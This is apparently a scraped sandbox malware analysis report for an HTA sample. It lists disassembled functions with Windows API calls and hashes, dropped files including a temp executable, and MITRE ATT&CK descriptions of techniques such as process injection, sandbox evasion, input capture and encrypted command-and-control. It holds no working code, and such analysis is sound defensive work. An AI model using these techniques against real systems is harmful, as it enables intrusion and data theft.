Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Message$CursorPostQuitShow
String ID: %s Fatal Error
API String ID: 3394085358-656502033
Opcode ID: 4705e2df44a35699463cb7f753a85dad1e44cb4ed3ed23fb58cb662cb65dd599
Instruction ID: 5c269960eaadc0675d830ac65235d26556278a12f248e0d1f3f2112717ed767f
Opcode Fuzzy Hash: 4705e2df44a35699463cb7f753a85dad1e44cb4ed3ed23fb58cb662cb65dd599
Instruction Fuzzy Hash: 27F0C875954300BBEB203764BC0FF9A3D259B55729F088420F644511E3DBF24564ABF3

Uniqueness

Uniqueness Score: -1.00%

Function 0021A221 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0021A229

Part of subcall function 0021A16A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0021F669,?,00000000,-00000008), ref: 0021A216

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021A261
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021A281

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: a4bcc2374a359497575450c06c9faed84824ae92109b7b9eb8ad96148b26ffca
Instruction ID: f728cf8a04ef24f74d91c12c1896ece5ee5a0622b2d008b8edb622ad4f0b5b7e
Opcode Fuzzy Hash: a4bcc2374a359497575450c06c9faed84824ae92109b7b9eb8ad96148b26ffca
Instruction Fuzzy Hash: 391104B25236157F672137B55C8ECEF69ECDEA93957100024FC09D2101FA718DA145F3

Uniqueness

Uniqueness Score: -1.00%

Function 00218084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00213742: GetLastError.KERNEL32(?,?,002060D8,?,?,?,?,0020E2B7,0020E284,?,?,?,?,?,0020E284,?), ref: 00213746
Part of subcall function 00213742: SetLastError.KERNEL32(00000000,0020E284,?,?,?,?,?,0020E284,?,00000000,?,00000003,00201B8B), ref: 002137E8

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0020B090,?,?,?,00000055,?,-00000050,?,?,?), ref: 00218145
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0020B090,?,?,?,00000055,?,-00000050,?,?), ref: 00218170

Strings

utf8, xrefs: 00218242

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 67f6fecf0564052b9beb1d7d661415c3cbbecc6946d49c85fd13abd9a002d139
Instruction ID: 1ad78e606c9a8fbe25676abfb2c0c8fa0b6ab3740d9a4acd494a719768bc4e11
Opcode Fuzzy Hash: 67f6fecf0564052b9beb1d7d661415c3cbbecc6946d49c85fd13abd9a002d139
Instruction Fuzzy Hash: 42512732620B46AADB25AF708CC2BE773E8EF75700F244425FD0597081FE709DE18AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00166290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001,?,?,?,?,00000000,00000000), ref: 001662D6
MessageBoxA.USER32(00000000,00000000,00000010), ref: 00166302

Strings

%s Error, xrefs: 001662E9

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: CursorMessageShow
String ID: %s Error
API String ID: 2689832819-1420171443
Opcode ID: eeb8702a29e0961fc1b8f1c719b630af0c92c23c78bf96dbe58aa1eb51bd3096
Instruction ID: 64031da6985a05a6bb483a3aa72ded2602d6f135da1f55cbb95b3b4d784ea9c3
Opcode Fuzzy Hash: eeb8702a29e0961fc1b8f1c719b630af0c92c23c78bf96dbe58aa1eb51bd3096
Instruction Fuzzy Hash: 1901F7B59242007FEB146B24FC4FF6F3A94AB65714F48442CF449062A2EBB25954EBF3

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report client_1.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Other

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wk5itrej.ll4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx5dca4z.5a2.ps1

C:\Users\user\AppData\Local\Temp\sxnoX.exe

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
client_1.hta

Function 08713AE9 Relevance: 9.3, Strings: 7, Instructions: 575
COMMON

Function 08747A48 Relevance: 5.9, Strings: 4, Instructions: 926
COMMON

Function 08711268 Relevance: 5.5, Strings: 4, Instructions: 509
COMMON

Function 087125B8 Relevance: 5.5, Strings: 4, Instructions: 474
COMMON

Function 0820943C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128
pipeCOMMON

Function 087108F8 Relevance: 4.1, Strings: 3, Instructions: 329
COMMON

Function 087473E8 Relevance: 7.6, Strings: 6, Instructions: 105
COMMON

Function 08748840 Relevance: 6.5, Strings: 5, Instructions: 273
COMMON

Function 0820B3E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
pipeCOMMON

Function 08717293 Relevance: 5.4, Strings: 4, Instructions: 360
COMMON

Function 00BCD468 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
COMMON

Function 00BCF8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
COMMON

Function 00BCCA44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
COMMON

Function 0866DDD1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
threadCOMMON

Function 00BCF960 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
fileCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre